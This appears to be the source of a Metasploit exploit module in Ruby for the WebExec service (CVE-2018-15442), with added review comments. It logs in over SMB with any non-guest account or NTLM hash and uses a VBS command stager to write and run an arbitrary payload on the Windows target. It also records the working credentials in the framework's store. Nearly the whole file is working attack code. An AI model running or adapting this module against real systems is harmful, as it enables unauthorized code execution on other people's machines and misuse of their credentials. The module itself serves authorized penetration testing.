Path: blob/master/modules/exploits/windows/smb/webexec.rb
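##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Windows XP systems that are not part of a domain default to treating all
# network logons as if they were Guest. This prevents SMB relay attacks from
# gaining administrative access to these systems. This setting can be found
# under:
#
# Local Security Settings >
# Local Policies >
# Security Options >
# Network Access: Sharing and security model for local accounts

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::SMB::Client::WebExec
  include Msf::Exploit::Powershell
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec
  include Msf::Auxiliary::Report

  # Shape of an "LM:NT" hash pair as accepted in SMBPass. Anchored with \A/\z
  # so that a plain password which merely *contains* 65 hash-looking
  # characters is not recorded in the credential store as an NTLM hash.
  NTLM_HASH_RE = /\A[0-9a-fA-F]{32}:[0-9a-fA-F]{32}\z/.freeze

  # Module metadata and options.
  #
  # TMPDIR is where the cmdstager drops the payload on the target; it must be
  # an absolute path because %ENV% expansion is not performed.
  # ALLOW_GUEST keeps going even when the SMB session was mapped to Guest.
  # MAX_LINE_LENGTH bounds each chunk the stager hands to execute_command.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WebExec Authenticated User Code Execution',
        'Description' => %q{
          This module uses a valid username and password of any level (or
          password hash) to execute an arbitrary payload. This module is similar
          to the "psexec" module, except allows any non-guest account by default.
        },
        'Author' => [
          'Ron <[email protected]>',
        ],
        'License' => MSF_LICENSE,
        'Privileged' => true,
        'DefaultOptions' => {
          'WfsDelay' => 10,
          'EXITFUNC' => 'thread'
        },
        'References' => [
          ['URL', 'https://webexec.org'],
          [ 'CVE', '2018-15442' ],
        ],
        'Payload' => {
          'Space' => 3072,
          'DisableNops' => true
        },
        'Platform' => 'win',
        'Arch' => [ARCH_X86, ARCH_X64],
        'Targets' => [
          [ 'Automatic', {} ],
          [ 'Native upload', {} ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2018-10-24',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          # The cmdstager writes the payload under TMPDIR on the target, so
          # operators should expect files left behind on the host.
          'SideEffects' => [ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options(
      [
        # This has to be a full path, %ENV% variables are not expanded
        OptString.new('TMPDIR', [ true, "The directory to stage our payload in", "c:\\Windows\\Temp\\" ])
      ]
    )

    register_advanced_options(
      [
        OptBool.new('ALLOW_GUEST', [true, "Keep trying if only given guest access", false]),
        OptInt.new('MAX_LINE_LENGTH', [true, "The length of lines when splitting up the payload", 1000]),
      ]
    )
  end

  # Callback for the command stager, which splits the full command into chunks
  # and hands each one to us. The stager runs with the :vbs flavor (set in
  # #exploit), and the chunk is rewritten so it survives being embedded in the
  # VBS launcher: empty strings and double-quoted strings are replaced with
  # Chr() expressions, and "cmd /c" is prepended so shell redirects work.
  #
  # @param command [String] one chunk of the staged command line
  # @param opts [Hash] stager options, passed straight through to execute_single_command
  def execute_command(command, opts)
    # "" (an empty string) has no Chr() equivalent, so express it as the first
    # zero characters of "A".
    rewritten = command.gsub('""', 'mid(Chr(65), 1, 0)')

    # Turn every remaining quoted literal into a Chr(n)+Chr(m)+... concatenation.
    # This is deliberately naive: there is no handling of escaped quotes.
    rewritten = rewritten.gsub(/"[^"]*"/) do |quoted|
      quoted.delete('"').chars.map { |ch| "Chr(#{ch.ord})" }.join('+')
    end

    # Prepend "cmd /c" so we can use a redirect
    execute_single_command("cmd /c " + rewritten, opts)
  end

  # Entry point: connect and authenticate over SMB, refuse Guest-mapped
  # sessions unless ALLOW_GUEST is set, record the working credential, then
  # deliver the payload through the WebExec service with the VBS cmdstager.
  def exploit
    print_status("Connecting to the server...")
    connect

    print_status("Authenticating to #{smbhost} as user '#{splitname(datastore['SMBUser'])}'...")
    smb_login

    # auth_user is empty when the server silently mapped us to Guest. Stop
    # here unless the operator explicitly asked to keep trying.
    if !simple.client.auth_user && !datastore['ALLOW_GUEST']
      print_line(" ")
      print_error(
        "FAILED! The remote host has only provided us with Guest privileges. " +
        "Please make sure that the correct username and password have been provided. " +
        "Windows XP systems that are not part of a domain will only provide Guest privileges " +
        "to network logins by default."
      )
      print_line(" ")
      disconnect
      return
    end

    # Only record a credential when a username was actually supplied.
    report_auth if datastore['SMBUser'].to_s.strip.length > 0

    # Avoid implementing NTLMSSP on Windows XP
    # http://seclists.org/metasploit/2009/q1/6
    if smb_peer_os == "Windows 5.1"
      connect(versions: [1])
      smb_login
    end

    # wexec yields the WebExec transport options; the cmdstager then calls
    # back into #execute_command for every chunk it needs to run.
    wexec(true) do |opts|
      opts[:flavor] = :vbs
      opts[:linemax] = datastore['MAX_LINE_LENGTH']
      opts[:temp] = datastore['TMPDIR']
      opts[:delay] = 0.05
      execute_cmdstager(opts)
    end
    handler
    # NOTE(review): disconnect is skipped if anything above raises; confirm the
    # framework's cleanup hook closes the SMB session in that case.
    disconnect
  end

  # Store the SMB credential that just authenticated, together with a
  # successful login record for the target's SMB service. SMBPass is classed
  # as an NTLM hash only when the whole value matches NTLM_HASH_RE; anything
  # else is stored as a password.
  def report_auth
    service_data = {
      address: ::Rex::Socket.getaddress(datastore['RHOST'], true),
      port: datastore['RPORT'],
      service_name: 'smb',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: self.fullname,
      private_data: datastore['SMBPass'],
      username: datastore['SMBUser'].downcase
    }

    # WORKGROUP is the non-domain default, so only a real domain is a realm.
    if datastore['SMBDomain'] && datastore['SMBDomain'] != 'WORKGROUP'
      credential_data.merge!({
        realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
        realm_value: datastore['SMBDomain']
      })
    end

    # .to_s guards against a nil SMBPass; the anchored regex avoids
    # mislabelling a password that merely contains a hash-shaped substring.
    private_type = datastore['SMBPass'].to_s =~ NTLM_HASH_RE ? :ntlm_hash : :password
    credential_data.merge!({ :private_type => private_type })

    credential_data.merge!(service_data)

    credential_core = create_credential(credential_data)

    # NOTE(review): the module accepts "any level" of user, so 'Admin' here
    # may overstate the account's privilege; the payload itself runs through
    # the WebExec service, not as this user. Confirm before relying on it.
    login_data = {
      access_level: 'Admin',
      core: credential_core,
      last_attempted_at: DateTime.now,
      status: Metasploit::Model::Login::Status::SUCCESSFUL
    }

    login_data.merge!(service_data)
    create_credential_login(login_data)
  end
end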